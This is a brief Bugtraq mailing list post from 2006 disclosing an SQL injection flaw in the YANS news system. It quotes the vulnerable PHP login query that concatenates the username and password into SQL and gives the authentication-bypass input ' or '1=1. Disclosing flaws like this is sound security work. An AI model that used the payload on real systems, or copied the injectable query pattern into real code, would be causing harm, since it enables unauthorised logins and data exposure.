Bugtraq mailing list archives
Y.A.N.S sql injection
From: navairum () gmail com
Date: 8 Nov 2006 12:59:34 -0000
Product: YANS (yet another news system) Link: http://sourceforge.net/projects/yans/ vuln code: $resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error()); simple sql injection ' or '1=1 ' or '1=1 -navairum
Current thread:
- Y.A.N.S sql injection navairum (Nov 08)